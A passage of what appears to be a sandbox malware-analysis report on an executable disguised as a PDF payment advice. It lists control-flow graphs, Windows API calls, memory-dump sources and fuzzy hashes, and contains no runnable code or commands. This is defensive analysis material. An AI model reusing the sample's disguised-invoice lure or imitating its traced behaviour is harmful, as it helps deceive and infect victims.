                                                                                                                                    • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                    • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1090 405c59-405c65 1091 405c66-405c9a GetTickCount GetTempFileNameW 1090->1091 1092 405ca9-405cab 1091->1092 1093 405c9c-405c9e 1091->1093 1095 405ca3-405ca6 1092->1095 1093->1091 1094 405ca0 1093->1094 1094->1095
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                                                    • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                    • API String ID: 1716503409-678247507
                                                                                                                                    • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                    • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                                                    • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                    • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1096 4063bf-4063df GetSystemDirectoryW 1097 4063e1 1096->1097 1098 4063e3-4063e5 1096->1098 1097->1098 1099 4063f6-4063f8 1098->1099 1100 4063e7-4063f0 1098->1100 1102 4063f9-406428 wsprintfW LoadLibraryW 1099->1102 1100->1099 1101 4063f2-4063f4 1100->1101 1101->1102
                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                                    • wsprintfW.USER32 ref: 00406411
                                                                                                                                    • LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                    • String ID: %s%S.dll
                                                                                                                                    • API String ID: 2200240437-2744773210
                                                                                                                                    • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                    • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                                                    • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                    • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"), ref: 00405AC2
                                                                                                                                      • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                                      • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                                                      • Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,?,00000000,000000F0), ref: 00401645
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving, xrefs: 00401638
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving
                                                                                                                                    • API String ID: 1892508949-2168965836
                                                                                                                                    • Opcode ID: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                                                    • Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
                                                                                                                                    • Opcode Fuzzy Hash: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                                                    • Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D
                                                                                                                                    APIs
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                                      • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                    • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                    • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                                                    • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                    • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                      • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                                      • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 334405425-0
                                                                                                                                    • Opcode ID: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                                                    • Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
                                                                                                                                    • Opcode Fuzzy Hash: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                                                    • Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D
                                                                                                                                    APIs
                                                                                                                                    • GlobalFree.KERNEL32(0052CA78), ref: 00401BA7
                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocFree
                                                                                                                                    • String ID: Call
                                                                                                                                    • API String ID: 3394109436-1824292864
                                                                                                                                    • Opcode ID: 3223036e7e2fecee151538c34771c34e58526c9ebab93d957a64f6eea7189736
                                                                                                                                    • Instruction ID: 27804974e3ca03393c04398de70bc6092cde1ed56c9d8f76027c1228d60f226a
                                                                                                                                    • Opcode Fuzzy Hash: 3223036e7e2fecee151538c34771c34e58526c9ebab93d957a64f6eea7189736
                                                                                                                                    • Instruction Fuzzy Hash: 32219072600101EBCB10EFA4CE85E5F77BAAF45324725413BF116B32D1DA78A8519B1D
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000046E,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsxC748.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Enum$CloseOpenValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 167947723-0
                                                                                                                                    • Opcode ID: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                                                    • Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
                                                                                                                                    • Opcode Fuzzy Hash: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                                                    • Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000046E,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsxC748.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                    • Opcode ID: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                                                    • Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
                                                                                                                                    • Opcode Fuzzy Hash: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                                                    • Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59
                                                                                                                                    APIs
                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                                                    • Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
                                                                                                                                    • Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                                                    • Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                      • Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                                      • Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
                                                                                                                                      • Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2547128583-0
                                                                                                                                    • Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                                                    • Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
                                                                                                                                    • Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                                                    • Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E
                                                                                                                                    APIs
                                                                                                                                    • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$EnableShow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1136574915-0
                                                                                                                                    • Opcode ID: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                                                    • Instruction ID: 46dfe73b81ae29a5099323896a5bc3e3d9df575198e3285abdeb67f25c429c8d
                                                                                                                                    • Opcode Fuzzy Hash: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                                                    • Instruction Fuzzy Hash: 76E08C326005009BCB10AFB5AA4999D3375DF90369710007BE402F10E1CABC9C409A2D
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
